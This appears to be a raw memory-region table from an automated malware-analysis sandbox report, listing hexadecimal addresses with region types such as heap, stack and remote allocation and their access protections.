page read and write
26260000
trusted library allocation
page read and write
7530000
trusted library allocation
page read and write
22DF0B20000
heap
page read and write
7390000
trusted library allocation
page read and write
2A90000
trusted library section
page read and write
2146A910000
heap
page read and write
26E20000
trusted library allocation
page read and write
824E000
stack
page read and write
22DF0AC2000
heap
page read and write
6052000
remote allocation
page execute and read and write
22DF0AA4000
heap
page read and write
22DF0AB9000
heap
page read and write
22DEEBD0000
heap
page read and write
7FFD33FF0000
trusted library allocation
page read and write
7DF419C40000
trusted library allocation
page execute and read and write
2E20000
trusted library allocation
page read and write
267E0000
trusted library allocation
page read and write
4660000
trusted library allocation
page read and write
2D50000
trusted library allocation
page read and write
20640340000
heap
page read and write
21401C1F000
trusted library allocation
page read and write
22DF0ABE000
heap
page read and write
8790000
direct allocation
page read and write
267F0000
trusted library allocation
page read and write
2146A61A000
heap
page read and write
80A0000
heap
page read and write
22DF0F0A000
heap
page read and write
6E0A000
stack
page read and write
7FFD34130000
trusted library allocation
page read and write
267D0000
trusted library allocation
page read and write
22DF0A61000
heap
page read and write
22DF0ED3000
heap
page read and write
26820000
trusted library allocation
page read and write
22DF0AB4000
heap
page read and write
88DE000
stack
page read and write
710E000
stack
page read and write
22DF0EB0000
heap
page read and write
2E27000
trusted library allocation
page execute and read and write
267D3000
trusted library allocation
page read and write
8110000
trusted library allocation
page read and write
2B2B000
heap
page read and write
22DF0AC2000
heap
page read and write
84EC000
heap
page read and write
2146A64A000
heap
page read and write
26116000
trusted library allocation
page read and write
267E0000
trusted library allocation
page read and write
47D8000
trusted library allocation
page read and write
E8F11BA000
stack
page read and write
7FFD33E60000
trusted library allocation
page read and write
267E0000
trusted library allocation
page read and write
838C000
stack
page read and write
24100000
heap
page read and write
2740000
heap
page read and write
22DF0A99000
heap
page read and write
22DF0A8D000
heap
page read and write
2C98000
heap
page read and write
267F0000
trusted library allocation
page read and write
22DF0AC2000
heap
page read and write
7FFD33EAC000
trusted library allocation
page execute and read and write
22DF0ABE000
heap
page read and write
74DE000
stack
page read and write
267E0000
trusted library allocation
page read and write
20640300000
heap
page read and write
4341EFE000
stack
page read and write
7FFD340E0000
trusted library allocation
page read and write
6D2E000
stack
page read and write
26FE000
stack
page read and write
2146A61E000
heap
page read and write
2613D000
trusted library allocation
page read and write
7FFD33F00000
trusted library allocation
page read and write
8780000
direct allocation
page read and write
267F0000
trusted library allocation
page read and write
267E0000
trusted library allocation
page read and write
267D0000
trusted library allocation
page read and write
267F2000
trusted library allocation
page read and write
6A52000
remote allocation
page execute and read and write
7FB0000
heap
page read and write
267F0000
trusted library allocation
page read and write
2BF3000
trusted library allocation
page execute and read and write
22DF0A61000
heap
page read and write
21400228000
trusted library allocation
page read and write
214684E5000
heap
page read and write
4342DCE000
stack
page read and write
A2F2000
direct allocation
page execute and read and write
267E0000
trusted library allocation
page read and write
22DF0B20000
heap
page read and write
828C000
stack
page read and write
23B1F000
stack
page read and write
267E0000
trusted library allocation
page read and write
22DEECA8000
heap
page read and write
6E8C000
stack
page read and write
267F0000
trusted library allocation
page read and write
E8F1DFB000
stack
page read and write
26800000
trusted library allocation
page read and write
7248000
heap
page read and write
804D000
stack
page read and write
708E000
stack
page read and write
22DF0B05000
heap
page read and write
21469D10000
trusted library allocation
page read and write
7FFD34120000
trusted library allocation
page read and write
2140203A000
trusted library allocation
page read and write
7F7E0000
trusted library allocation
page execute and read and write
2D20000
trusted library section
page read and write
72B1000
heap
page read and write
22DEED7B000
heap
page read and write
834E000
stack
page read and write
267F0000
trusted library allocation
page read and write
22DEED24000
heap
page read and write
26800000
trusted library allocation
page read and write
22DEED7E000
heap
page read and write
22DEED1F000
heap
page read and write
7FFD340C0000
trusted library allocation
page read and write
22DF0A87000
heap
page read and write
26800000
trusted library allocation
page read and write
4342E4E000
stack
page read and write
26800000
trusted library allocation
page read and write
21469E75000
heap
page read and write
23C5F000
stack
page read and write
7FFD341C0000
trusted library allocation
page read and write
22DF0C01000
heap
page read and write
4B67AFF000
unkown
page read and write
23BD0000
trusted library allocation
page read and write
E8F15FE000
stack
page read and write
2611B000
trusted library allocation
page read and write
869E000
stack
page read and write
26EF0000
trusted library allocation
page read and write
2D30000
trusted library allocation
page read and write
6DCD000
stack
page read and write
22DF0A75000
heap
page read and write
22DEED40000
heap
page read and write
85F0000
direct allocation
page read and write
2B38000
heap
page read and write
22DF0A63000
heap
page read and write
26FEF000
stack
page read and write
267E0000
trusted library allocation
page read and write
267D0000
trusted library allocation
page read and write
21469E89000
heap
page read and write
6B0F000
stack
page read and write
434207E000
stack
page read and write
841F000
heap
page read and write
7590000
trusted library allocation
page read and write
8460000
heap
page readonly
22DF0F10000
heap
page read and write
267F0000
trusted library allocation
page read and write
267C0000
trusted library allocation
page read and write
56E8000
trusted library allocation
page read and write
240FE000
stack
page read and write
6A8E000
stack
page read and write
2D90000
trusted library allocation
page read and write
7FFD34020000
trusted library allocation
page execute and read and write
22DF0EBD000
heap
page read and write
267D0000
trusted library allocation
page read and write
22DF0EBC000
heap
page read and write
267E0000
trusted library allocation
page read and write
7141000
heap
page read and write
22DEED1D000
heap
page read and write
23D0E000
stack
page read and write
22DEED3F000
heap
page read and write
267E0000
trusted library allocation
page read and write
24192000
trusted library allocation
page read and write
7FFD33F36000
trusted library allocation
page execute and read and write
270A0000
trusted library allocation
page read and write
2146A3DC000
heap
page read and write
267E0000
trusted library allocation
page read and write
2A3E000
stack
page read and write
22DF0AC2000
heap
page read and write
26830000
trusted library allocation
page read and write
7253000
heap
page read and write
22DEED03000
heap
page read and write
2146A390000
heap
page read and write
2E25000
trusted library allocation
page execute and read and write
2E30000
trusted library allocation
page execute and read and write
22DEECF8000
heap
page read and write
266BE000
stack
page read and write
4342FCB000
stack
page read and write
265DE000
stack
page read and write
22DF0A9C000
heap
page read and write
22DF0A70000
heap
page read and write
2146841E000
heap
page read and write
22DF0A71000
heap
page read and write
26110000
trusted library allocation
page read and write
2146A396000
heap
page read and write
23B5D000
stack
page read and write
26850000
trusted library allocation
page read and write
2BF0000
trusted library allocation
page read and write
8640000
direct allocation
page read and write
21469CA0000
trusted library allocation
page read and write
267F0000
trusted library allocation
page read and write
2D40000
trusted library allocation
page read and write
267F0000
trusted library allocation
page read and write
22DF0ECD000
heap
page read and write
25111000
trusted library allocation
page read and write
27070000
trusted library allocation
page read and write
26804000
trusted library allocation
page read and write
267C8000
trusted library allocation
page read and write
27B0000
heap
page read and write
2682D000
stack
page read and write
6B4E000
stack
page read and write
85D0000
trusted library allocation
page read and write
7FFD341B0000
trusted library allocation
page read and write
22DEEFF5000
heap
page read and write
2418A000
trusted library allocation
page read and write
434237E000
stack
page read and write
85E0000
direct allocation
page read and write
98F2000
direct allocation
page execute and read and write
2D80000
heap
page read and write
22DEEC80000
heap
page read and write
22DEED1D000
heap
page read and write
23FAF000
stack
page read and write
6D6A000
stack
page read and write
267E0000
trusted library allocation
page read and write
7FFD34010000
trusted library allocation
page execute and read and write
26840000
trusted library allocation
page read and write
26150000
trusted library allocation
page read and write
22DEED07000
heap
page read and write
7FFD34070000
trusted library allocation
page read and write
270A0000
trusted library allocation
page read and write
27080000
trusted library allocation
page read and write
27070000
trusted library allocation
page read and write
240BC000
stack
page read and write
2D6A000
trusted library allocation
page execute and read and write
2146A609000
heap
page read and write
83E5000
heap
page read and write
26810000
trusted library allocation
page read and write
7560000
trusted library allocation
page read and write
21400ACA000
trusted library allocation
page read and write
87F0000
direct allocation
page read and write
26840000
trusted library allocation
page read and write
22DF0A91000
heap
page read and write
7FFD33E54000
trusted library allocation
page read and write
267F0000
trusted library allocation
page read and write
7FFD34180000
trusted library allocation
page read and write
809E000
stack
page read and write
26800000
trusted library allocation
page read and write
8610000
direct allocation
page read and write
21469D00000
heap
page read and write
7550000
trusted library allocation
page read and write
267D0000
trusted library allocation
page read and write
7FFD34170000
trusted library allocation
page read and write
40D0000
remote allocation
page execute and read and write
22DF0A61000
heap
page read and write
2E12000
trusted library allocation
page read and write
267E0000
trusted library allocation
page read and write
2415D000
trusted library allocation
page read and write
26260000
trusted library allocation
page read and write
267D0000
trusted library allocation
page read and write
88E0000
heap
page read and write
22DF0EB7000
heap
page read and write
206402D0000
heap
page read and write
84F8000
heap
page read and write
7380000
trusted library allocation
page read and write
21410001000
trusted library allocation
page read and write
7FE0000
trusted library allocation
page read and write
263C7000
heap
page read and write
26810000
trusted library allocation
page read and write
21468350000
heap
page read and write
267F0000
trusted library allocation
page read and write
28AE000
stack
page read and write
73A0000
trusted library allocation
page read and write
E8F17FE000
stack
page read and write
2C90000
heap
page read and write
83A4000
heap
page read and write
745E000
stack
page read and write
8660000
direct allocation
page read and write
8650000
direct allocation
page read and write
45A0000
trusted library allocation
page execute and read and write
214021F0000
trusted library allocation
page read and write
27070000
trusted library allocation
page read and write
7FFD34040000
trusted library allocation
page execute and read and write
8440000
heap
page read and write
86DE000
stack
page read and write
2E1A000
trusted library allocation
page execute and read and write
267E0000
trusted library allocation
page read and write
267E0000
trusted library allocation
page read and write
26830000
trusted library allocation
page read and write
26326000
heap
page read and write
73B0000
trusted library allocation
page read and write
22DF0ED3000
heap
page read and write
22DF0A8D000
heap
page read and write
26830000
trusted library allocation
page read and write
7370000
trusted library allocation
page read and write
26810000
trusted library allocation
page read and write
22DEED1F000
heap
page read and write
87E0000
direct allocation
page read and write
84CD000
heap
page read and write
2146A590000
heap
page read and write
43419A3000
stack
page read and write
21402037000
trusted library allocation
page read and write
26820000
trusted library allocation
page read and write
86C0000
direct allocation
page read and write
24111000
trusted library allocation
page read and write
26310000
remote allocation
page read and write
26800000
trusted library allocation
page read and write
2E0D000
trusted library allocation
page execute and read and write
26800000
trusted library allocation
page read and write
75C0000
trusted library allocation
page read and write
214102F9000
trusted library allocation
page read and write
267F0000
trusted library allocation
page read and write
22DF0A81000
heap
page read and write
21400AA5000
trusted library allocation
page read and write
26830000
trusted library allocation
page read and write
75A0000
trusted library allocation
page read and write
22DF0C02000
heap
page read and write
22DF0AC2000
heap
page read and write
7580000
trusted library allocation
page read and write
267F0000
trusted library allocation
page read and write
21469CD0000
heap
page readonly
7FFD34110000
trusted library allocation
page read and write
267E0000
trusted library allocation
page read and write
267E0000
trusted library allocation
page read and write
2140218F000
trusted library allocation
page read and write
7FFD34150000
trusted library allocation
page read and write
85A0000
trusted library allocation
page read and write
73F0000
heap
page execute and read and write
4608000
trusted library allocation
page read and write
27090000
trusted library allocation
page read and write
2D70000
trusted library allocation
page read and write
267F0000
trusted library allocation
page read and write
4341D7E000
stack
page read and write
27070000
trusted library allocation
page read and write
2064034B000
heap
page read and write
7FFD33E50000
trusted library allocation
page read and write
2A7F000
stack
page read and write
2140052B000
trusted library allocation
page read and write
214008EC000
trusted library allocation
page read and write
8620000
direct allocation
page read and write
7FFD34001000
trusted library allocation
page read and write
267F0000
trusted library allocation
page read and write
22DF0B60000
heap
page read and write
267F0000
trusted library allocation
page read and write
7FFD341D0000
trusted library allocation
page read and write
21400A62000
trusted library allocation
page read and write
2146A607000
heap
page read and write
20640510000
heap
page read and write
26800000
trusted library allocation
page read and write
267E0000
trusted library allocation
page read and write
267D0000
trusted library allocation
page read and write
82CC000
stack
page read and write
2D43000
trusted library allocation
page execute and read and write
86B0000
direct allocation
page read and write
4342F4B000
stack
page read and write
2BE0000
trusted library allocation
page read and write
21469DE7000
heap
page execute and read and write
2860000
heap
page read and write
6B90000
heap
page execute and read and write
26136000
trusted library allocation
page read and write
267F0000
trusted library allocation
page read and write
26EF0000
trusted library allocation
page read and write
267E0000
trusted library allocation
page read and write
22DEED7A000
heap
page read and write
22DF0A60000
heap
page read and write
8570000
direct allocation
page read and write
22DF0AB4000
heap
page read and write
267E0000
trusted library allocation
page read and write
22DF0EE3000
heap
page read and write
267E0000
trusted library allocation
page read and write
4670000
heap
page execute and read and write
24188000
trusted library allocation
page read and write
2748000
stack
page read and write
8EF2000
direct allocation
page execute and read and write
22DF0710000
heap
page read and write
2BFD000
trusted library allocation
page execute and read and write
267E0000
trusted library allocation
page read and write
23D50000
heap
page read and write
7FFD33F70000
trusted library allocation
page execute and read and write
214684E0000
heap
page read and write
2E2B000
trusted library allocation
page execute and read and write
22DF0CB1000
heap
page read and write
8670000
direct allocation
page read and write
2D4D000
trusted library allocation
page execute and read and write
22DF0A66000
heap
page read and write
267F0000
trusted library allocation
page read and write
27070000
trusted library allocation
page read and write
267E0000
trusted library allocation
page read and write
2DBC000
heap
page read and write
22DEED1F000
heap
page read and write
22DEEBC0000
heap
page read and write
267E0000
trusted library allocation
page read and write
206406D0000
heap
page read and write
22DF0A68000
heap
page read and write
7FC0000
trusted library allocation
page execute and read and write
21469D40000
trusted library allocation
page read and write
270C000
stack
page read and write
21401C1B000
trusted library allocation
page read and write
8470000
heap
page read and write
267F0000
trusted library allocation
page read and write
8585000
heap
page read and write
66BD000
stack
page read and write
24050000
trusted library allocation
page read and write
22DF0A7B000
heap
page read and write
267F0000
trusted library allocation
page read and write
22DEED34000
heap
page read and write
2140051D000
trusted library allocation
page read and write
22DF0CB0000
heap
page read and write
2B0C000
heap
page read and write
267F0000
trusted library allocation
page read and write
56A9000
trusted library allocation
page read and write
267F0000
trusted library allocation
page read and write
26EAF000
stack
page read and write
46E2000
trusted library allocation
page read and write
263E5000
heap
page read and write
267DD000
trusted library allocation
page read and write
728E000
heap
page read and write
21410309000
trusted library allocation
page read and write
21401E38000
trusted library allocation
page read and write
206402E0000
heap
page read and write
7FFD340A0000
trusted library allocation
page read and write
22DF0BD1000
heap
page read and write
267F0000
trusted library allocation
page read and write
43423FB000
stack
page read and write
2D1E000
stack
page read and write
8770000
direct allocation
page read and write
22DF0ED3000
heap
page read and write
26860000
trusted library allocation
page read and write
2A0F000
unkown
page read and write
22DF0C03000
heap
page read and write
22DEECBE000
heap
page read and write
27080000
trusted library allocation
page read and write
885E000
stack
page read and write
22DF0EE0000
heap
page read and write
22DF0AC2000
heap
page read and write
22DF0AC2000
heap
page read and write
22DEECA9000
heap
page read and write
2146A3DE000
heap
page read and write
4681000
trusted library allocation
page read and write
8160000
trusted library allocation
page read and write
267D0000
trusted library allocation
page read and write
22DEED7B000
heap
page read and write
26160000
trusted library allocation
page read and write
21400AC8000
trusted library allocation
page read and write
27070000
trusted library allocation
page read and write
267F0000
trusted library allocation
page read and write
261DC000
stack
page read and write
22DF0A83000
heap
page read and write
6EA0000
heap
page read and write
7400000
trusted library allocation
page read and write
270B0000
trusted library allocation
page read and write
22DF0AA1000
heap
page read and write
22DF0AFF000
heap
page read and write
22DF0BB4000
heap
page read and write
7FFD33F10000
trusted library allocation
page execute and read and write
4341E7E000
stack
page read and write
267D0000
trusted library allocation
page read and write
21401FC9000
trusted library allocation
page read and write
263E8000
heap
page read and write
4341CFE000
stack
page read and write
2661E000
stack
page read and write
7E52000
remote allocation
page execute and read and write
24060000
heap
page execute and read and write
730B000
heap
page read and write
8105000
trusted library allocation
page read and write
8390000
heap
page read and write
25178000
trusted library allocation
page read and write
761C000
stack
page read and write
2146A61C000
heap
page read and write
267E0000
trusted library allocation
page read and write
4252000
remote allocation
page execute and read and write
26EEE000
stack
page read and write
21469CC0000
trusted library allocation
page read and write
87C0000
direct allocation
page read and write
21401C04000
trusted library allocation
page read and write
2612E000
trusted library allocation
page read and write
7FFD3400A000
trusted library allocation
page read and write
2681E000
trusted library allocation
page read and write
22DEEBF0000
heap
page read and write
2146A5BB000
heap
page read and write
E8F1BFE000
stack
page read and write
7240000
heap
page read and write
22DEED75000
heap
page read and write
27070000
trusted library allocation
page read and write
2146A5CE000
heap
page read and write
83F1000
heap
page read and write
465C000
stack
page read and write
26800000
trusted library allocation
page read and write
23EF8000
stack
page read and write
22DEED2A000
heap
page read and write
4B6773D000
stack
page read and write
21401934000
trusted library allocation
page read and write
267E0000
trusted library allocation
page read and write
22DF0C01000
heap
page read and write
24186000
trusted library allocation
page read and write
4C52000
remote allocation
page execute and read and write
7FFD33E70000
trusted library allocation
page read and write
27070000
trusted library allocation
page read and write
459E000
stack
page read and write
267F0000
trusted library allocation
page read and write
4342ECD000
stack
page read and write
22DF0A70000
heap
page read and write
7417000
trusted library allocation
page read and write
26867000
trusted library allocation
page read and write
26114000
trusted library allocation
page read and write
26320000
heap
page read and write
6C2D000
stack
page read and write
7FFD34100000
trusted library allocation
page read and write
26142000
trusted library allocation
page read and write
21400A8E000
trusted library allocation
page read and write
22DEEC88000
heap
page read and write
21401FDE000
trusted library allocation
page read and write
26310000
remote allocation
page read and write
2D60000
trusted library allocation
page read and write
87B0000
direct allocation
page read and write
2C70000
heap
page read and write
267BE000
stack
page read and write
21401FF1000
trusted library allocation
page read and write
267F0000
trusted library allocation
page read and write
22DF0F0D000
heap
page read and write
263DF000
heap
page read and write
6ACE000
stack
page read and write
26388000
heap
page read and write
267F0000
trusted library allocation
page read and write
84B0000
heap
page read and write
22DF0A61000
heap
page read and write
271EE000
stack
page read and write
22DEED1D000
heap
page read and write
22DEECDB000
heap
page read and write
22DF0AC2000
heap
page read and write
27E0000
heap
page read and write
26860000
trusted library allocation
page read and write
2D44000
trusted library allocation
page read and write
80B0000
trusted library allocation
page execute and read and write
22DF0EB4000
heap
page read and write
267E0000
trusted library allocation
page read and write
21401FB5000
trusted library allocation
page read and write
22DF0AC2000
heap
page read and write
267D0000
trusted library allocation
page read and write
2146A5F0000
heap
page read and write
267E0000
trusted library allocation
page read and write
267F0000
trusted library allocation
page read and write
21400A52000
trusted library allocation
page read and write
8590000
trusted library allocation
page read and write
26300000
heap
page read and write
26840000
trusted library allocation
page read and write
21469CE0000
trusted library allocation
page read and write
E8F1CFF000
stack
page read and write
22DF0ECD000
heap
page read and write
2710E000
stack
page read and write
84F5000
heap
page read and write
23C1E000
stack
page read and write
21400532000
trusted library allocation
page read and write
21410011000
trusted library allocation
page read and write
22DEED7A000
heap
page read and write
2146839E000
heap
page read and write
214683F5000
heap
page read and write
83DA000
heap
page read and write
2665E000
stack
page read and write
21400085000
trusted library allocation
page read and write
21468270000
heap
page read and write
2146A610000
heap
page read and write
267F0000
trusted library allocation
page read and write
22DEED6E000
heap
page read and write
22DF0AFF000
heap
page read and write
22DF0ECD000
heap
page read and write
E8F18FF000
stack
page read and write
7387000
trusted library allocation
page read and write
2619C000
stack
page read and write
8760000
direct allocation
page read and write
8600000
direct allocation
page read and write
2AE3000
heap
page read and write
7570000
trusted library allocation
page read and write
22DF0A70000
heap
page read and write
27070000
trusted library allocation
page read and write
7FFD33E53000
trusted library allocation
page execute and read and write
23E70000
direct allocation
page read and write
26310000
remote allocation
page read and write
26810000
trusted library allocation
page read and write
22DF0AC2000
heap
page read and write
26EF0000
trusted library allocation
page read and write
267D0000
trusted library allocation
page read and write
43419EF000
stack
page read and write
262B0000
heap
page read and write
22DF0AAD000
heap
page read and write
22DF0A86000
heap
page read and write
2E00000
trusted library allocation
page read and write
26EF0000
trusted library allocation
page read and write
22DEECE6000
heap
page read and write
2146A4B1000
heap
page read and write
2146848C000
heap
page read and write
7FFD340B0000
trusted library allocation
page read and write
8680000
direct allocation
page read and write
22DEED37000
heap
page read and write
22DF0ECD000
heap
page read and write
22DF0F16000
heap
page read and write
2659D000
stack
page read and write
267E0000
trusted library allocation
page read and write
2146A040000
heap
page execute and read and write
27B9000
heap
page read and write
22DF0A6B000
heap
page read and write
267F0000
trusted library allocation
page read and write
26800000
trusted library allocation
page read and write
22DF0ED3000
heap
page read and write
26800000
trusted library allocation
page read and write
21400A7E000
trusted library allocation
page read and write
267F0000
trusted library allocation
page read and write
8630000
trusted library allocation
page execute and read and write
7410000
trusted library allocation
page read and write
2414F000
trusted library allocation
page read and write
23E60000
direct allocation
page read and write
83BC000
heap
page read and write
22DEED7A000
heap
page read and write
B6F2000
direct allocation
page execute and read and write
5652000
remote allocation
page execute and read and write
7452000
remote allocation
page execute and read and write
24070000
heap
page execute and read and write
21468370000
heap
page read and write
6C6B000
stack
page read and write
267F0000
trusted library allocation
page read and write
729A000
heap
page read and write
2D59000
trusted library allocation
page read and write
22DF0A6F000
heap
page read and write
23B9B000
stack
page read and write
22DEEFF0000
heap
page read and write
267F0000
trusted library allocation
page read and write
267DD000
trusted library allocation
page read and write
267E0000
trusted library allocation
page read and write
2D72000
trusted library allocation
page read and write
27080000
trusted library allocation
page read and write
267F0000
trusted library allocation
page read and write
263E6000
heap
page read and write
26830000
trusted library allocation
page read and write
2E22000
trusted library allocation
page read and write
22DEECDB000
heap
page read and write
852C000
heap
page read and write
22DF0A64000
heap
page read and write
26F00000
trusted library allocation
page read and write
23F3E000
stack
page read and write
2B00000
heap
page read and write
21468390000
heap
page read and write
2146A445000
heap
page read and write
23CCD000
stack
page read and write
22DF0A7B000
heap
page read and write
6E90000
heap
page read and write
75B0000
trusted library allocation
page read and write
214005E4000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
21401C31000
trusted library allocation
page read and write
22DF0B05000
heap
page read and write
22DF0AFF000
heap
page read and write
267F0000
trusted library allocation
page read and write
6B8E000
stack
page read and write
7FFD341A0000
trusted library allocation
page read and write
87D0000
direct allocation
page read and write
26122000
trusted library allocation
page read and write
21401C44000
trusted library allocation
page read and write
8690000
direct allocation
page read and write
83F9000
heap
page read and write
749E000
stack
page read and write
27070000
trusted library allocation
page read and write
22DEED2D000
heap
page read and write
2611E000
trusted library allocation
page read and write
267F0000
trusted library allocation
page read and write
267E0000
trusted library allocation
page read and write
CAF2000
direct allocation
page execute and read and write
26830000
trusted library allocation
page execute and read and write
830C000
stack
page read and write
7290000
heap
page read and write
22DF0F1D000
heap
page read and write
267E0000
trusted library allocation
page read and write
4341DFC000
stack
page read and write
267F0000
trusted library allocation
page read and write
2146A602000
heap
page read and write
206406D5000
heap
page read and write
22DEED34000
heap
page read and write
22DF0A94000
heap
page read and write
285E000
unkown
page read and write
267F0000
trusted library allocation
page read and write
7FFD34050000
trusted library allocation
page read and write
267D0000
trusted library allocation
page read and write
214684B0000
heap
page read and write
267E1000
trusted library allocation
page read and write
27070000
trusted library allocation
page read and write
26131000
trusted library allocation
page read and write
267E0000
trusted library allocation
page read and write
26F00000
trusted library allocation
page read and write
4341C7E000
stack
page read and write
2AAD000
heap
page read and write
267E0000
trusted library allocation
page read and write
434227E000
stack
page read and write
8539000
heap
page read and write
267F0000
trusted library allocation
page read and write
7FFD34190000
trusted library allocation
page read and write
2635E000
heap
page read and write
22DF0A76000
heap
page read and write
E8F14FE000
stack
page read and write
8430000
heap
page read and write
2146A471000
heap
page read and write
23F40000
trusted library allocation
page read and write
214683DB000
heap
page read and write
22DF0A6C000
heap
page read and write
267E0000
trusted library allocation
page read and write
22DF0AA4000
heap
page read and write
45B0000
heap
page read and write
22DF0EB6000
heap
page read and write
889F000
stack
page read and write
26EF0000
trusted library allocation
page read and write
86A0000
direct allocation
page read and write
7263000
heap
page read and write
267F0000
trusted library allocation
page read and write
27070000
trusted library allocation
page read and write
2DA0000
heap
page readonly
751D000
stack
page read and write
22DF0EB1000
heap
page read and write
7FD0000
trusted library allocation
page read and write
267E0000
trusted library allocation
page read and write
7FFD33E52000
trusted library allocation
page read and write
267E7000
trusted library allocation
page read and write
4341FFE000
stack
page read and write
26800000
trusted library allocation
page read and write
8580000
heap
page read and write
26830000
trusted library allocation
page read and write
704E000
stack
page read and write
214021F4000
trusted library allocation
page read and write
22DF0AC2000
heap
page read and write
7FFD340F0000
trusted library allocation
page read and write
26EF0000
trusted library allocation
page read and write
7FFD34032000
trusted library allocation
page read and write
27D0000
heap
page read and write
267E0000
trusted library allocation
page read and write
26820000
trusted library allocation
page read and write
267E0000
trusted library allocation
page read and write
21469DE0000
heap
page execute and read and write
70CE000
stack
page read and write
2635E000
heap
page read and write
23F60000
heap
page read and write
2DB0000
heap
page read and write
7FFD34080000
trusted library allocation
page read and write
7F860000
trusted library allocation
page execute and read and write
2146848E000
heap
page read and write
22DF0C03000
heap
page read and write
22DF0EB7000
heap
page read and write
There are 831 hidden memdumps, click here to show them.